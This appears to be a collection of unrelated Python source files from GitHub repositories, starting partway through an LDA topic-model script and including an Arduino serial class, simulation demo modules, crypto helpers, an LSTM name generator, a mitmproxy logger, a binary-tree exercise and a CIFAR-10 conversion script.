Coverged: {2:.8f}\".format(i_iter, likelihood, converged), file=text_file)\r\n \r\n doc.gamma = gamma\r\n doc.phi = phi\r\n return likelihood # Check: scope of gamma and phi\r\n\r\n\r\ndef doc_e_step(doc, model, ss, VAR_MAX_ITER):\r\n \r\n likelihood = variational_inference(doc, model, max_iter = VAR_MAX_ITER);\r\n\r\n # update sufficient statistics\r\n\r\n gamma_sum = np.sum(doc.gamma)\r\n ss.alpha_suffstats = (ss.alpha_suffstats + np.sum(digamma(doc.gamma))\r\n - model.num_topics * digamma(gamma_sum))\r\n\r\n for n in range(doc.num_terms):\r\n for k in range(model.num_topics):\r\n ss.class_term[k,doc.terms[n]] = ss.class_term[k,doc.terms[n]]+ doc.term_counts[n]*doc.phi[n,k]\r\n ss.class_total[k] = ss.class_total[k] + 
doc.term_counts[n]*doc.phi[n,k]\r\n \r\n ss.num_docs = ss.num_docs + 1\r\n \r\n return likelihood\r\n\r\n\r\n\r\ndef lda_mle(model, ss, estimate_alpha):\r\n for k in range(model.num_topics):\r\n for w in range( model.num_terms):\r\n if (ss.class_term[k,w] > 0):\r\n model.log_prob_w[k,w] =np.log(ss.class_term[k,w]) - np.log(ss.class_total[k])\r\n else:\r\n model.log_prob_w[k,w] = -100\r\n\r\n if estimate_alpha:\r\n model.alpha = opt_alpha(ss.alpha_suffstats,ss.num_docs, model.num_topics)\r\n print(\"new alpha = {0:.3}\\n\".format(model.alpha))\r\n\r\n\r\n\r\ndef EM(docs, model, EM_CONVERGED = 1e-4, EM_MAX_ITER = 2000):\r\n i = 0\r\n likelihood_old = 0\r\n converged = 1\r\n VAR_MAX_ITER = 20\r\n while (((converged < 0) or (converged > EM_CONVERGED) or (i <= 2)) and (i <= EM_MAX_ITER)):\r\n i = i + 1\r\n print(\"****** EM iteration {} ****** timestamp:{:.0f}\".format(i, time.time()))\r\n likelihood = 0\r\n ss = LDA_Suffstats(model)\r\n\r\n # e-step\r\n\r\n for doc in docs:\r\n likelihood = likelihood + doc_e_step(doc, model, ss, VAR_MAX_ITER)\r\n\r\n # m-step\r\n lda_mle(model,ss, estimate_alpha = True)\r\n \r\n # check for convergence\r\n if i >1:\r\n converged = (likelihood_old - likelihood) / likelihood_old\r\n if (converged < 0): VAR_MAX_ITER = VAR_MAX_ITER * 2 \r\n \r\n likelihood_old = likelihood\r\n\r\ndef infer( test_labels, test_corpus):\r\n test_doc_term_mat = vectorizer.transform(test_corpus)\r\n WS, DS = lda.utils.matrix_to_lists(test_doc_term_mat)\r\n t_docs = []\r\n for d in range(len(test_corpus)):\r\n t_docs.append(Document(doc_id = test_idlist[d], K = model.num_topics, words_id = WS[DS==d], \r\n label = reuters.categories(test_idlist[d])))\r\n for doc in t_docs: \r\n variational_inference(doc, model, 20)\r\n return t_docs, test_doc_term_mat\r\n \r\n# def main():\r\n \r\n\r\nif __name__ == '__main__':\r\n \r\n text_file = open(\"Output.txt\", \"w\")\r\n\r\n number_of_docs = 10788\r\n #num_train_docs = int(number_of_docs*0.8)\r\n num_train_docs = int(10788-3019)\r\n\r\n np.random.seed(6)\r\n \r\n# idlist = list(np.random.choice(reuters.fileids(), number_of_docs))\r\n# train_idlist = idlist[:num_train_docs]\r\n# test_idlist = idlist[num_train_docs:]\r\n\r\n idlist = reuters.fileids()\r\n train_idlist = idlist[3019:]\r\n test_idlist = idlist[:3019]\r\n\r\n stop_words = set(stopwords.words('english'))\r\n p_stemmer = PorterStemmer()\r\n \r\n def read_document(idlist, stop_words=stop_words, stemmer=p_stemmer, V=None):\r\n labels = []\r\n corpus = []\r\n for id in idlist:\r\n labels.append(reuters.categories(id))\r\n stopped_tokens = [word.lower() for word in reuters.words(id) if word.isalpha() and (word.lower() not in stop_words)]\r\n reuters.words(id).close()\r\n stemmed_tokens = [p_stemmer.stem(token) for token in stopped_tokens] \r\n if V:\r\n stemmed_tokens = [token for token in stemmed_tokens if token in V]\r\n corpus.append(' '.join(stemmed_tokens))\r\n return labels, corpus\r\n \r\n labels, corpus = read_document(train_idlist)\r\n labelsets = list(set(sum(labels,[]))) # concatnate the lists in labels and keep the uniques\r\n number_of_topics = 10 #len(labelsets)\r\n \r\n vectorizer = CountVectorizer(lowercase = False)\r\n doc_term_mat = vectorizer.fit_transform(corpus)\r\n #np.sum(doc_term_mat)\r\n #doc_term_mat[99,1787]\r\n Vocabulary = vectorizer.get_feature_names()\r\n \r\n WS, DS = lda.utils.matrix_to_lists(doc_term_mat)\r\n \r\n my_lda_start = time.time()\r\n model = LDA_Model(num_topics = number_of_topics, num_terms = len(Vocabulary)) \r\n\r\n docs = []\r\n for d in 
range(num_train_docs):\r\n docs.append(Document(doc_id = train_idlist[d], K = model.num_topics, words_id = WS[DS==d], \r\n label = reuters.categories(train_idlist[d])))\r\n \r\n EM(docs,model,EM_MAX_ITER = 1000)\r\n \r\n my_lda_end = time.time()\r\n my_lda_time = my_lda_end-my_lda_start\r\n print(\"My LDA runtime: {}\".format(my_lda_time))\r\n\r\n text_file.close()\r\n \r\n # calculate the top 10 terms of each topic\r\n \r\n topicwords = []\r\n maxTopicWordsNum = 10\r\n for z in range(0, model.num_topics):\r\n ids = model.log_prob_w[z, :].argsort()\r\n topicword = []\r\n for j in ids:\r\n topicword.insert(0, Vocabulary[j])\r\n topicwords.append(topicword[0 : min(maxTopicWordsNum, len(topicword))])\r\n\r\n\r\n\r\n\r\n np.set_printoptions(threshold=10000)\r\n X = []\r\n Y = []\r\n for i in range(num_train_docs):\r\n #print('gamma: {} \\n label: {}'.format(docs[i].gamma, docs[i].label))\r\n X.append(docs[i].gamma)\r\n Y.append(docs[i].label)\r\n \r\n three_classes = []\r\n for label in Y:\r\n if 'earn' in label:\r\n three_classes.append('0')\r\n elif 'acq' in label:\r\n three_classes.append('1')\r\n else:\r\n three_classes.append('2')\r\n \r\n \r\n test_labels, test_corpus = read_document(test_idlist, V=Vocabulary)\r\n test_docs, test_mat = infer(test_labels, test_corpus)\r\n \r\n test_X = []\r\n test_Y = []\r\n for i in range(number_of_docs-num_train_docs):\r\n #print('gamma: {} \\n label: {}'.format(docs[i].gamma, docs[i].label))\r\n test_X.append(test_docs[i].gamma)\r\n test_Y.append(test_docs[i].label)\r\n\r\n\r\n mul_binarizer = MultiLabelBinarizer()\r\n bin_Y = mul_binarizer.fit_transform(three_classes)\r\n \r\n# le = LabelEncoder()\r\n# vec_Y = le.fit_transform(three_classes)\r\n new_X = np.vstack(X)\r\n\r\n SVM_classifier = OneVsRestClassifier(svm.SVC())\r\n SVM_classifier.fit(new_X,bin_Y)\r\n pred = SVM_classifier.predict(test_X)\r\n pred = np.array(pred) \r\n pred_label = np.argmax(pred,axis=1)\r\n \r\n test_classes=[]\r\n for label in test_Y:\r\n if 'earn' in label:\r\n test_classes.append(0)\r\n elif 'acq' in label:\r\n test_classes.append(1)\r\n else:\r\n test_classes.append(2)\r\n \r\n test_classes = np.array(test_classes)\r\n np.sum(test_classes[pred_label==0]==2)\r\n\r\n# table = np.argmax(X, axis=1)\r\n# Y[:20]\r\n# plt.plot(list(range(38)),test_X[3])\r\n# plt.xlabel('Topic index')\r\n# pred = np.argmax(test_X, axis=1)\r\n# \r\n# for p in table[:20]:\r\n# #print(Y[np.where(table==p)[0][0]])\r\n# print(topicwords[p])\r\n \r\n# np.save('model_alpha', model.alpha)\r\n# np.save('model_log_prob_w', model.log_prob_w)\r\n# np.save('model_num_topics', model.num_topics)\r\n# np.save('model_num_terms', model.num_terms)\r\n# \r\n# np.save('train_gammas',X)\r\n# np.save('train_labels',Y)\r\n# np.save('test_gammas',test_X)\r\n# np.save('test_labels',test_Y)\r\n\r\n \r\n# '''\r\n# LDA Package\r\n# '''\r\n# \r\n# pkg_lda_start = time.time()\r\n# model_p = lda.LDA(n_topics=number_of_topics)\r\n# model_p.fit(doc_term_mat)\r\n# \r\n# pkg_lda_end = time.time()\r\n# pkg_lda_time = pkg_lda_end - pkg_lda_start\r\n# \r\n# \r\n# print(\"Package LDA runtime: {}\".format(pkg_lda_time))\r\n# print(\"My LDA runtime: {}\".format(my_lda_time))\r\n#\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"ShibaiZhang/LDA","sub_path":"reuters_main.py","file_name":"reuters_main.py","file_ext":"py","file_size_in_byte":12526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9366604829","text":"\"\"\"\nSerial communication 
class\n\"\"\"\n\nimport serial\nimport time\nimport config\n\n\nclass Arduino(object):\n def __init__(self):\n try:\n self.arduino = serial.Serial(config.SERIAL_PORT, 115200, timeout=.1)\n except serial.serialutil.SerialException:\n raise RuntimeError('Impossible to connect to Arduino')\n\n time.sleep(1)\n\n def write(self, msg):\n # \"#\" is termination char\n msg = str(msg) + '#'\n self.arduino.write(msg)","repo_name":"fferrara/pysmartenv","sub_path":"pysmartenv/arduino.py","file_name":"arduino.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1564128114","text":"from MiroClasses.MiroAPI_selector import SelectedAPI as MiroAPI\nfrom MiroClasses.MiroModule import Module as MiroModule\nfrom MiroClasses.MiroComponent import MiroComponent\nimport numpy as np\n\nfrom src import Components\nfrom src import Boosters\nfrom src import Sensors\n\ntry:\n import CustomComponents_local as CustomComponents\nexcept:\n import CustomComponents\n\n### LANDER BOX\n# To learn how to modify the Lander, start by changing the components for the\n# Bottom and Top plates on lines 31 and 32 to change the Lander dimension.\n# Then change the rods on lines 36-39 to another component model to see how \n# the lander changes. \ndef DemoLander(args):\n aim = args[0]\n tilt = -args[1]\n Lander = MiroModule('Landing Box')\n\n # Add top and bottom plates\n # MC component arguments are rotation, position and fixed (true/false)\n # Defaults to [0,0,0], [0,0,0], False if arguments are not provided\n # Note: Use Lander.RotateX, Y or Z if you are making several rotations to\n # a component, as the order the rotations are made in is significant. \n Lander.AddComponent(Components.MC035([ 0, 90, 0], [0,0,0], False), 'Bottom plate')\n Lander.AddComponent(Components.MC035([180, 90, 0]), 'Top plate')\n\n # Add vertical rods\n Lander.AddComponent(Components.MC113([ 0, 0, 90]), 'Rod A')\n Lander.AddComponent(Components.MC113([ 0, 0, 90]), 'Rod B')\n Lander.AddComponent(Components.MC113([ 0, 0, 90]), 'Rod C')\n Lander.AddComponent(Components.MC113([ 0, 0, 90]), 'Rod D')\n \n # Add a sensor to the module.\n # We need to flip it upside down as with the Top Plate.\n # This can be done after adding it to the module by .RotateX()\n Lander.AddSensor(Sensors.MSA02([ 0, 0, 0]), 'Accelerometer')\n Lander.RotateX('Accelerometer', 180)\n\n Lander.RotateComponentsZ(tilt)\n Lander.RotateComponentsY(aim)\n\n # Connect Rods to bottom plate\n # It connects the first component to the second by\n # moving the second component so the points match\n Lander.ConnectComponents('Bottom plate', 'A', 'Rod A', 'A')\n Lander.ConnectComponents('Bottom plate', 'B', 'Rod B', 'A')\n Lander.ConnectComponents('Bottom plate', 'C', 'Rod C', 'A')\n Lander.ConnectComponents('Bottom plate', 'D', 'Rod D', 'A')\n\n # Connect Top plate to rods (note the order compared to above)\n Lander.ConnectComponents('Rod A', 'B', 'Top plate', 'C')\n Lander.ConnectComponents('Rod B', 'B', 'Top plate', 'D')\n Lander.ConnectComponents('Rod C', 'B', 'Top plate', 'A')\n Lander.ConnectComponents('Rod D', 'B', 'Top plate', 'B')\n\n # Connect sensor to the module, behaves just like a component\n Lander.ConnectComponents('Top plate', 'E', 'Accelerometer', 'Linkpoint')\n\n return Lander\n\n\n### CATAPULT LAUNCHER\n# To learn how to modify the Launcher, start by changing the component 'Main arm' on line 26\n# to one of different length and calibrate the spring constant on line 77. 
\n# The Launcher can hit the target with modifications to only these two things.\ndef DemoLauncher(args):\n # Extract arguments into local variables\n aim = args[0]\n angle = args[1]\n\n # Start by creating a new module\n Launcher = MiroModule('Catapult')\n\n # Add some components\n Launcher.AddComponent(Components.MC907([0,0,0]), 'Base')\n Launcher.AddComponent(Components.MC906([0,0,0]), 'Pillar')\n Launcher.AddComponent(Components.MC144([0,0,-angle]), 'Main arm')\n Launcher.AddComponent(Components.MC095([0,90,-angle]), 'Launch plate')\n\n Launcher.AddComponent(Components.MC115([0,90,180-angle]), 'Stop holder')\n Launcher.AddComponent(Components.MC221([90,0,0]), 'Rotation pole out') # Appearance only\n Launcher.AddComponent(Components.MC221([90,0,0]), 'Rotation pole in') # Appearance only\n\n Launcher.AddComponent(CustomComponents.KristerK([-90,-150,0]), 'Custom K') # Custom Component\n\n # Example of how to set the reference point for where to put the lander\n # This puts the reference point 8cm above the Launch plate\n Launcher.SetReferenceComponent('Launch plate', [0, 0.08, 0])\n\n # Reference point rotates when ALL components rotate\n Launcher.RotateComponentsY(aim)\n\n # Connect the components. The first remains in position, and the second component is moved to match\n Launcher.ConnectComponents('Base', 'E', 'Pillar', 'C')\n Launcher.ConnectComponents('Pillar', 'A', 'Main arm', 'C', 0.025) # Here, the 0.025 is to leave space between\n Launcher.ConnectComponents('Main arm', 'H', 'Launch plate', 'E')\n Launcher.ConnectComponents('Launch plate', 'A', 'Stop holder', 'H')\n Launcher.ConnectComponents('Launch plate', 'B', 'Stop holder', 'G')\n Launcher.ConnectComponents('Main arm', 'D', 'Rotation pole out', 'B')\n Launcher.ConnectComponents('Main arm', 'C', 'Rotation pole in', 'A')\n Launcher.ConnectComponents('Pillar', 'F', 'Custom K', 'C')\n\n # To find the global coordinate of a link point, you can print it like this\n # print(Launcher.GetLinkPointXYZ('Main arm', 'B'))\n\n # To visualize where a link point is, you can use this function, or the DUMMY component. \n # Make sure to do this after connecting all the components.\n Launcher.MarkLinkpoint('Base', 'B', color='blue')\n\n # Set a spring to make the catapult launch. You can use any values, but they must be fixed \n # (i.e. not computed from input arguments)\n # State which two connection points you want to connect the spring to, then choose a rest length and spring constant.\n # Rest length: How long the spring is when it exerts no force. If it is made shorter then this length, \n # it is compressed and will push out to expand. If it is made longer, it is streched and will pull to contract.\n # Spring constant: How powerful the spring is. Higher value means more force.\n # The spring is not visible, but the connection points are visualized by small spheres. You can change the default appearance or remove these with input arguments.\n Launcher.SetSpring('Base', 'A', 'Main arm', 'E', 1.1, 17000)\n\n # Fixate the moving parts so that they initially do not move. This is released after the initial delay.\n Launcher.Fixate('Main arm')\n\n return Launcher\n\n\n### Little robot\ndef DemoRobot1():\n MyRobot = MiroModule('MyRobot')\n\n # Add body components\n MyRobot.AddComponent(Components.MC035(), 'Base')\n MyRobot.AddComponent(Components.MC093(), 'Top')\n MyRobot.RotateX('Top', 180)\n \n # Connect the components. 
The first remains in position, and the second component is moved to match\n MyRobot.ConnectComponents('Base', 'A', 'Top', 'A')\n MyRobot.ConnectComponents('Base', 'C', 'Top', 'B')\n\n # Add left wheel components\n MyRobot.AddComponent(Components.MC242(), 'Wheel: Left, Back')\n MyRobot.AddComponent(Components.MC242(), 'Wheel: Left, Front')\n MyRobot.RotateX(['Wheel: Left, Front', 'Wheel: Left, Back'], 90)\n \n # Attach the left wheels\n MyRobot.ConnectComponents('Base', 'G', 'Wheel: Left, Back', 'A')\n MyRobot.ConnectComponents('Base', 'F', 'Wheel: Left, Front', 'A')\n\n # # Add right wheel components\n MyRobot.AddComponent(Components.MC242(), 'Wheel: Right, Back')\n MyRobot.AddComponent(Components.MC242(), 'Wheel: Right, Front')\n MyRobot.RotateX(['Wheel: Right, Front', 'Wheel: Right, Back'], -90)\n\n # Attach the right wheels\n MyRobot.ConnectComponents('Base', 'I', 'Wheel: Right, Back', 'A')\n MyRobot.ConnectComponents('Base', 'H', 'Wheel: Right, Front', 'A')\n \n # Set custom textures\n # MyRobot.SetTexture(['Base', 'Top'], 'mirobooster.png', [1,1])\n # MyRobot.SetTexture(['Wheel: Left, Back', 'Wheel: Left, Back', 'Wheel: Left, Back', 'Wheel: Left, Back'], 'woodwheel.png', [1,1])\n\n # Save the robot layout to enable generating a map using NodeMap\n MyRobot.CreateModuleMap()\n\n return MyRobot","repo_name":"Teskedsgubben/MiroSimulint","sub_path":"DemoModules.py","file_name":"DemoModules.py","file_ext":"py","file_size_in_byte":7788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"20471347155","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport policies.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('policies', '0007_auto_20170125_2159'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='policy',\n name='pdf',\n field=models.FileField(blank=True, null=True, upload_to=policies.models.file_name),\n ),\n ]\n","repo_name":"vishnutej9492/simplelifeclone","sub_path":"policies/migrations/0008_auto_20170125_2208.py","file_name":"0008_auto_20170125_2208.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73370399751","text":"import hashlib\nimport secrets\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes, serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nimport io\n\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n\n\ndef stop_server(err):\n \"\"\" Print err and stop script execution \"\"\"\n print(f\"Fatal Error due to: {err}\")\n exit(1)\n\n\ndef parse_port(file_path):\n \"\"\" Parse port.info for port number. On any failure, None will be returned. \"\"\"\n port = None\n try:\n with open(file_path, \"r\") as info:\n port = info.readline().strip()\n port = int(port)\n except (ValueError, FileNotFoundError):\n port = None\n return port\n\n\ndef generate_aes_key():\n \"\"\" Generating AES key. 
\"\"\"\n key = secrets.token_bytes(16)\n return key\n\n\ndef encrypt_aes_key(aes_key, public_key_str):\n # Load the public key from a string\n public_key = serialization.load_pem_public_key(\n public_key_str.encode(),\n backend=default_backend()\n )\n\n # Encrypt the AES key with the public key\n encrypted_aes_key = public_key.encrypt(\n aes_key,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n\n return encrypted_aes_key\n\n\ndef decrypt_file_content(encrypted_content, aes_key):\n cipher = Cipher(algorithms.AES(aes_key), modes.CFB(b'\\0' * 16), backend=default_backend())\n decryptor = cipher.decryptor()\n decrypted_content = decryptor.update(encrypted_content) + decryptor.finalize()\n return decrypted_content\n\n\ndef save_to_ram(file_content, file_name):\n in_memory_file = io.BytesIO(file_content)\n file_path = f'/tmp/{file_name}'\n with open(file_path, 'wb') as f:\n f.write(in_memory_file.read())\n return file_path\n","repo_name":"Zsofi91/home_assignment","sub_path":"server_new/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"634434531","text":"# Import necessary modules\nimport json\nimport os\n\n# Define a function to collect user feedback\ndef collect_feedback():\n # Check if feedback file exists\n if os.path.isfile(\"feedback.json\"):\n # If it exists, load feedback data\n with open(\"feedback.json\", \"r\") as feedback_file:\n feedback_data = json.load(feedback_file)\n else:\n # If it doesn't exist, create empty feedback data\n feedback_data = {\"feedback\": []}\n\n # Ask user for feedback\n feedback = input(\"Please enter your feedback: \")\n\n # Add feedback to feedback data\n feedback_data[\"feedback\"].append(feedback)\n\n # Save feedback data to file\n with open(\"feedback.json\", \"w\") as feedback_file:\n json.dump(feedback_data, feedback_file)\n\n # Offer incentive for providing feedback\n print(\"Thank you for your feedback! 
As a token of our appreciation, please enjoy this exclusive content.\")\n\n# Call the function to collect feedback\ncollect_feedback()\n","repo_name":"willalmighty03/test","sub_path":"user feedback system.py","file_name":"user feedback system.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1416325885","text":"import numpy as np\nfrom keras.models import load_model, Model, Sequential\nfrom keras.layers import LSTM, Dense\nfrom keras.utils import to_categorical\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.sequence import pad_sequences\nimport pickle\n\nDino = open('/home/kaleeswaran/Desktop/Lstm/Dinosaur.txt','r').read()\nDino = Dino.lower()\n\nchars = sorted(list(set(Dino)))\nmapping = {c:i for i,c in enumerate(chars)}\n\ndef subset(length):\n length = length\n sequences = []\n\n for i in range(length, len(Dino)):\n seq = Dino[i-length:i+1]\n sequences.append(seq)\n return(sequences)\n\n# length of the characters you want the model to learn from\nsequences = subset(4)\n\nenc = []\nfor x in sequences:\n tem = [mapping[char] for char in x]\n enc.append(tem)\n\nenc = np.array(enc)\nX = enc[:,:-1]\ny = enc[:,-1]\n\nunique = len(mapping)\nX = [to_categorical(x, num_classes = unique) for x in X]\nX = np.array(X)\ny = [to_categorical(yo, num_classes = unique) for yo in y]\ny = np.array(y)\n\nmodel = Sequential()\nmodel.add(LSTM(128, input_shape=(X.shape[1], X.shape[2])))\nmodel.add(Dense(unique, activation='softmax'))\n\nopt = Adam(lr=0.01, beta_1=0.9, beta_2=0.999, decay=0.01)\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\nmodel.fit(X, y, epochs=100)\n\n# third arguement is the sequence length you initialised earlier and seed_text is the text from where you\n# want the model to make prediction of the dinosaur name\ndef gen_seq(model, mapping, seq_length, seed_text):\n\tin_text = seed_text\n\twhile in_text[-1] != '\\n':\n\t\tencoded = [mapping[char] for char in in_text]\n\t\tencoded = pad_sequences([encoded], maxlen = seq_length, truncating = 'pre')\n\t\tencoded = to_categorical(encoded, num_classes = len(mapping))\n\t\tyhat = model.predict_classes(encoded, verbose = 0)\n\t\tout_char = ''\n\t\tfor char, index in mapping.items():\n\t\t\tif index == yhat:\n\t\t\t\tbreak\n\t\tin_text += char\n\t\tprint(in_text)\n\treturn in_text\n\n\nprint(gen_seq(model, mapping, 4, 'gat'))","repo_name":"kaleeswaranm/Text-Generation-LSTM-Keras","sub_path":"Dinosaur.py","file_name":"Dinosaur.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"27358653606","text":"import bisect\n\nclass MyCalendar:\n\n def __init__(self):\n self.starts = []\n self.ends = []\n \n def book(self, start: int, end: int) -> bool:\n start_index = bisect.bisect_left(self.starts, end)\n end_index = bisect.bisect_right(self.ends, start)\n \n if start_index == end_index:\n self.starts.insert(start_index, start)\n self.ends.insert(end_index, end)\n return True\n return False\n\n# Your MyCalendar object will be instantiated and called as such:\n# obj = MyCalendar()\n# param_1 = obj.book(start,end)","repo_name":"madhvi-n/leetcode-python","sub_path":"729-my-calendar-i/729-my-calendar-i.py","file_name":"729-my-calendar-i.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} 
+{"seq_id":"36494816454","text":"from mitmproxy import http\nimport re\n\n\ndef response(flow: http.HTTPFlow) -> None:\n if flow.request.pretty_url == \"http://127.0.0.1:8080\": # the url of the AI model server\n # this is a response from the AI model server\n data = flow.response.text # get the response data\n # check if the response contains Python code and store it if it does\n codeBlockRegex = r'```python\\n([\\s\\S]*?)```'\n matches = re.findall(codeBlockRegex, data)\n if matches:\n for match in matches:\n print(f\"Found Python code in response: {match}\") # replace this with your actual code storage function\n","repo_name":"itsPreto/baby-code","sub_path":"scripts/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"27"} +{"seq_id":"41038541184","text":"# Python program to insert element in binary tree\nfrom idlelib.tree import TreeNode\nfrom typing import Optional, List\n\nclass newNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n'''\n Link: https://leetcode.com/problems/sum-of-left-leaves/\n Purpose: Find a sum of left leaves\n parameter: Optional[TreeNode] root - a root of a binary tree\n return: int sum - a sum of left leaves\n Pre-Condition: The number of nodes in the tree is in the range [1, 1000].\n : -1000 <= Node.val <= 1000\n Post-Condition: none\n'''\n# use nonlocal: runtime: O(n), memory: O(depth of tree)\ndef sumOfLeftLeaves_M1(root: Optional[TreeNode]) -> int:\n sum = 0\n\n def dfs(root: Optional[TreeNode]):\n nonlocal sum\n if root.left:\n # increment sum by a childNode.value if childNode is a left leaf node\n if not root.left.left and not root.left.right:\n sum = sum + root.left.data\n\n dfs(root.left)\n\n if root.right:\n dfs(root.right)\n\n dfs(root)\n\n return sum\n\n'''\n Link: https://leetcode.com/problems/sum-of-left-leaves/\n Purpose: Find a sum of left leaves\n parameter: Optional[TreeNode] root - a root of a binary tree\n return: int sum - a sum of left leaves\n Pre-Condition: The number of nodes in the tree is in the range [1, 1000].\n : -1000 <= Node.val <= 1000\n Post-Condition: none\n'''\n# increment sum: runtime: O(n), memory: O(depth of tree)\ndef sumOfLeftLeaves_M2(root: Optional[TreeNode]) -> int:\n def dfs(root: Optional[TreeNode]) -> int:\n sum = 0\n if root.left:\n if not root.left.left and not root.left.right:\n sum = sum + dfs(root.left) + root.left.data\n else:\n sum = sum + dfs(root.left)\n\n if root.right:\n sum = sum + dfs(root.right)\n\n return sum\n\n return dfs(root)\n\n# Credit: https://www.geeksforgeeks.org/level-order-tree-traversal/\ndef height(node):\n if node is None:\n return 0\n else:\n # Compute the height of each subtree\n lheight = height(node.left)\n rheight = height(node.right)\n\n # Use the larger one\n if lheight > rheight:\n return lheight + 1\n else:\n return rheight + 1\n\n# Credit: https://www.geeksforgeeks.org/insertion-in-a-binary-tree-in-level-order/\n\"\"\"function to insert element in binary tree \"\"\"\ndef insert(temp, key):\n if not temp:\n root = newNode(key)\n return\n q = []\n q.append(temp)\n\n # Do level order traversal until we find\n # an empty place.\n while (len(q)):\n temp = q[0]\n q.pop(0)\n\n if (not temp.left):\n temp.left = newNode(key)\n break\n else:\n q.append(temp.left)\n\n if (not temp.right):\n temp.right = newNode(key)\n break\n else:\n q.append(temp.right)\n\n\nif __name__ == \"__main__\":\n root1 = newNode(3)\n root1.left = 
newNode(9)\n root1.right = newNode(20)\n root1.right.left = newNode(15)\n root1.right.right = newNode(7)\n\n print(\"M1:\", sumOfLeftLeaves_M1(root1)) # 24\n print(\"M2:\",sumOfLeftLeaves_M2(root1)) # 24\n print(\"+=====+\")\n\n # now 9 is not a leaf\n root1.left.right = newNode(3)\n\n print(\"M1:\", sumOfLeftLeaves_M1(root1)) # 15\n print(\"M2:\",sumOfLeftLeaves_M2(root1)) # 15\n print(\"+=====+\")\n\n root1.left.left = newNode(10)\n\n print(\"M1:\",sumOfLeftLeaves_M1(root1)) # 25\n print(\"M2:\",sumOfLeftLeaves_M2(root1)) # 25\n print(\"+=====+\")\n\n root1.right.right.left = newNode(5)\n\n print(\"M1:\",sumOfLeftLeaves_M1(root1)) # 30\n print(\"M2:\",sumOfLeftLeaves_M2(root1)) # 30\n print(\"+=====+\")\n\n","repo_name":"Poomon001/Competitive-Programming","sub_path":"club python/_ALL DATA STRUCTURE AID TOOLS/recursive with return/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32423522794","text":"#!/usr/bin/env python3\nimport copy\nimport os\nfrom subprocess import call\nimport numpy as np\n# sklearn.cross_validation was removed from scikit-learn; sklearn.utils.shuffle covers the shuffling below\nfrom sklearn.utils import shuffle as sklearn_shuffle\nimport pickle\nimport cv2\nimport shutil\n\ndef unpickle(file):\n fo = open(file, 'rb')\n dict = pickle.load(fo, encoding='latin-1')\n fo.close()\n return dict\n\ndef shuffle_data(data, labels):\n # shuffle data and labels in unison (replaces the old train_test_split call with test_size=0.0)\n data, labels = sklearn_shuffle(data, labels, random_state=42)\n return data, labels\n\ndef load_data(train_batches):\n data = []\n labels = []\n for data_batch_i in train_batches:\n d = unpickle(\n os.path.join(cifar_python_directory, data_batch_i)\n )\n data.append(d['data'])\n labels.append(np.array(d['labels']))\n # Merge training batches on their first dimension\n data = np.concatenate(data)\n labels = np.concatenate(labels)\n length = len(labels)\n\n data, labels = shuffle_data(data, labels)\n\n return data.reshape(length, 3, 32, 32), labels\n\ndef load_label_names():\n d = unpickle (\n os.path.join(cifar_python_directory, \"batches.meta\")\n )\n return d\n\nif __name__ == \"__main__\":\n\n cifar_python_archive = os.path.abspath(\"cifar-10-python.tar.gz\")\n\n if not os.path.exists(cifar_python_archive):\n print(\"Downloading CIFAR10...\")\n call(\n \"wget http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz\",\n shell=True\n )\n print(\"Downloading done.\\n\")\n\n cifar_python_directory = os.path.abspath(\"cifar-10-batches-py\")\n\n print(\"Extracting...\")\n\n call(\n \"tar -zxvf cifar-10-python.tar.gz\",\n shell=True\n )\n\n print(\"Extracting successfully done to {}\".format(cifar_python_directory))\n\n print(\"Converting...\")\n\n cifar_caffe_directory = os.path.abspath('./data')\n\n X, y = load_data(\n [\"data_batch_{}\".format(i) for i in range(1, 6)]\n )\n\n Xt, yt = load_data([\"test_batch\"])\n\n L = load_label_names()\n\n if not os.path.exists(cifar_caffe_directory):\n os.makedirs(cifar_caffe_directory)\n\n train_index = 0\n train_listing = \"\"\n for (img, label) in zip([x for x in X], [l for l in y]):\n fname = \"train-{}.png\".format(train_index)\n r = img[0].astype(np.uint8)\n g = img[1].astype(np.uint8)\n b = img[2].astype(np.uint8)\n output = cv2.merge((b, g, r))\n cv2.imwrite(os.path.join(cifar_caffe_directory, fname), output)\n train_listing += cifar_caffe_directory + \"/\" + fname + \" \" + str(label) + \"\\n\"\n train_index += 1\n\n with open(os.path.join(cifar_caffe_directory, 